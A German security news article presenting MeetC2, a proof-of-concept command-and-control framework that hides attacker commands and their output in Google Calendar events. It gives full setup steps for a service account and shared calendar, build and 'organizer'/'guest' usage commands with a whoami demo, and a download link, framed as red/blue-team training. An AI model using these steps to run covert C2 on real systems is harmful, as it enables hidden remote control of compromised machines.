
Angreifer setzen zunehmend auf Cloud-Dienste, um Command-and-Control-Datenverkehr (C2) unauffällig zu tarnen. Mit dem Proof of Concept MeetC2 – auch bekannt als Meeting C2 – wird diese Technik demonstriert.
Das plattformübergreifende, serverlose Framework nutzt die Google-Kalender-API als verdeckten Kommunikationskanal zwischen Angreifern und kompromittierten Systemen. Entwickelt wurde MeetC2, um unter kontrollierten Bedingungen Red- und Blue-Teams die Möglichkeit zu geben, Erkennung, Telemetrie und Reaktion auf Cloud-Missbrauch zu trainieren.
Während einer Purple-Team-Übung zeigte sich, wie leicht sich Datenverkehr über vertrauenswürdige SaaS-Domänen einschleusen lässt. Über den Endpunkt „Ereignisse“ im Google Kalender fragt der Gastagent alle 30 Sekunden nach neuen, unsichtbaren Einträgen und empfängt so Befehle der Angreifer.
MeetC2 missbraucht Google-Kalender-API für verdeckte Kommunikation
MeetC2, auch bekannt als MeetingC2, ist eine plattformübergreifende Anwendung (macOS/Linux), die zeigt, wie legitime Cloud-Dienste für feindliche Operationen missbraucht werden können. Mithilfe der Google Kalender-APIs erstellt das Framework einen versteckten Kommunikationskanal, der sich in den normalen Geschäftsverkehr einfügt.
Die hier verwendeten Domains sind „oauth2.googleapis.com” und „www.googleapis.com”. Nach der Authentifizierung tritt der Agent in eine Abfrageschleife ein und sendet alle 30 Sekunden GET-Anfragen an „www.googleapis.com/calendar/v3/calendars/{calendarId}/events”, um nach neuen Kalenderereignissen zu suchen, die Befehle enthalten.
Wenn der Organisator einen neuen Befehl ausgeben möchte, kann er über den „organiser”-Agenten ein neues Ereignis an denselben Kalender-API-Endpunkt POST senden, wobei der Befehl in das Zusammenfassungsfeld des Ereignisses eingebettet ist, z. B. „Meeting von niemandem: [BEFEHL]”.
Der „guest”-Agent identifiziert diese Befehlsereignisse während seiner regelmäßigen Abfrage, extrahiert und führt den Befehl lokal aus und aktualisiert dann dasselbe Ereignis über eine PUT-Anfrage, um die Befehlsausgabe in den Parameter [OUTPUT] [/OUTPUT] im Beschreibungsfeld aufzunehmen.
Einrichtung von Google Kalender
- Navigieren Sie zur URL Google Cloud Console und melden Sie sich mit Ihrem Google-Konto an. Wählen Sie ein Projekt aus oder erstellen Sie ein neues Projekt.
- Navigieren Sie zu „APIs & Services“ → Klicken Sie auf „Library“, suchen Sie im Suchfeld nach Google Calendar API und klicken Sie auf „ENABLED“. Es dauert 20 bis 30 Sekunden, bis die API in Ihrem Projekt aktiviert ist.
- Navigieren Sie anschließend zu „APIs & Services“ → „Anmeldedaten“ und klicken Sie oben auf „+ ANMELDEDATEN ERSTELLEN“. Wählen Sie „Dienstkonto“, geben Sie die erforderlichen Details ein, d. h. Dienstkontoname: calendar-invite, Beschreibung: Synchronisiert Kalenderereignisse, und fahren Sie fort. Überspringen Sie die optionalen Rollen/Benutzer und klicken Sie auf „FERTIG“.
- Überprüfen Sie nun Ihre Dienstkontenlisten. Sie sollten eine E-Mail mit dem Betreff „calendar-invite@your-project.iam.gserviceaccount.com“ erhalten haben. Gehen Sie zum Abschnitt „SCHLÜSSEL“ → „SCHLÜSSEL HINZUFÜGEN“ → „Neuen Schlüssel erstellen“, wählen Sie das Format „JSON“ und laden Sie den „SCHLÜSSEL“ herunter. Benennen Sie die heruntergeladene JSON-Datei in credentials.json um, damit Sie sie später verwenden können.
- Navigieren Sie zur URL „https://calendar.google.com“, suchen Sie auf der linken Seite „Other calendars“ (Andere Kalender) → Klicken Sie auf das „+“ und dann auf „Create new calendar“ (Neuen Kalender erstellen) und geben Sie den Namen/die Beschreibung ein. Klicken Sie anschließend auf die drei Punkte daneben → „Settings and sharing“ (Einstellungen und Freigabe). Scrollen Sie nach unten zu „Kalender integrieren“ und suchen Sie nach der „Kalender-ID“, die wie folgt aussehen sollte: „abc123xyz@group.calendar.google.com“.
- Letzte Schritte: Suchen Sie unter „Kalendereinstellungen“ die Option „Für bestimmte Personen freigeben“, klicken Sie auf „+ Personen hinzufügen“ und fügen Sie die E-Mail-Adresse des Dienstkontos aus Schritt 4 oben hinzu (die mit der Endung @your-project.iam.gserviceaccount.com). Ändern Sie die Berechtigung in „Änderungen an Ereignissen vornehmen“ und klicken Sie auf „Senden“. Damit sind Sie fertig.
Befehlszeile
Kompilieren:
./build-all.sh <credentials.json> <calendar_id>
Attacker host:
bash-3.2$ ./organizer credentials.json [NAME]@group.calendar.google.com
MeetC2 Organizer
Commands:
exec <cmd> — Execute on all hosts
exec @host:<cmd> — Execute on specific host
exec @*:<cmd> — Execute on all hosts (explicit)
list — List recent commands
get <event_id> — Get command output
clear — Clear executed events
exit — Exit organizer
— — — — — — — — — — — — — — — — — — — —
> exec whoami
Command created for all hosts: qfj4tt8a4uoi8p7cd3b8t31337
>
>
Victim host:
bash-3.2$ ./guest-darwin-arm64
16:08:04 MeetC2 Guest started on dhirajmishra
16:08:04 Calendar ID: [NAME]@group.calendar.google.com
16:08:04 Polling every 10 seconds…
16:08:15 Executing command: whoami
16:08:16 Successfully updated event with output
„OpSec: Obwohl dies funktionsfähig ist, weiß ich, dass es Verbesserungen bei OpSec speziell für die Binärdatei „guest“ gibt. Verwenden Sie daher für eine solche Einrichtung bitte ein Test-GCP-Projekt, das später gelöscht werden sollte.“ – Dhiraj
Download MeetC2
https://github.com/deriv-security/MeetC2
Entdecken Sie mehr
Fachartikel

Wie Cyberkriminelle Microsoft-Nutzer mit gefälschten Gerätecodes täuschen

OpenAI präsentiert GPT-5.2-Codex: KI-Revolution für autonome Softwareentwicklung und IT-Sicherheit

Speicherfehler in Live-Systemen aufspüren: GWP-ASan macht es möglich

Geparkte Domains als Einfallstor für Cyberkriminalität: Über 90 Prozent leiten zu Schadsoftware weiter

Umfassender Schutz für geschäftskritische SAP-Systeme: Strategien und Best Practices
Studien
![Featured image for “Phishing-Studie deckt auf: [EXTERN]-Markierung schützt Klinikpersonal kaum”](https://www.all-about-security.de/wp-content/uploads/2025/12/phishing-4.jpg)
Phishing-Studie deckt auf: [EXTERN]-Markierung schützt Klinikpersonal kaum

Gartner-Umfrage: Mehrheit der nicht geschäftsführenden Direktoren zweifelt am wirtschaftlichen Wert von Cybersicherheit

49 Prozent der IT-Verantwortlichen in Sicherheitsirrtum

Deutschland im Glasfaserausbau international abgehängt

NIS2 kommt – Proliance-Studie zeigt die Lage im Mittelstand
Whitepaper

State of Cloud Security Report 2025: Cloud-Angriffsfläche wächst schnell durch KI

BITMi zum Gutachten zum Datenzugriff von US-Behörden: EU-Unternehmen als Schlüssel zur Datensouveränität

Agentic AI als Katalysator: Wie die Software Defined Industry die Produktion revolutioniert

OWASP veröffentlicht Security-Framework für autonome KI-Systeme

Malware in Bewegung: Wie animierte Köder Nutzer in die Infektionsfalle locken
Hamsterrad-Rebell

Platform Security: Warum ERP-Systeme besondere Sicherheitsmaßnahmen erfordern

Daten in eigener Hand: Europas Souveränität im Fokus

Sicherer Remote-Zugriff (SRA) für Operational Technology (OT) und industrielle Steuerungs- und Produktionssysteme (ICS)

Identity und Access Management (IAM) im Zeitalter der KI-Agenten: Sichere Integration von KI in Unternehmenssysteme









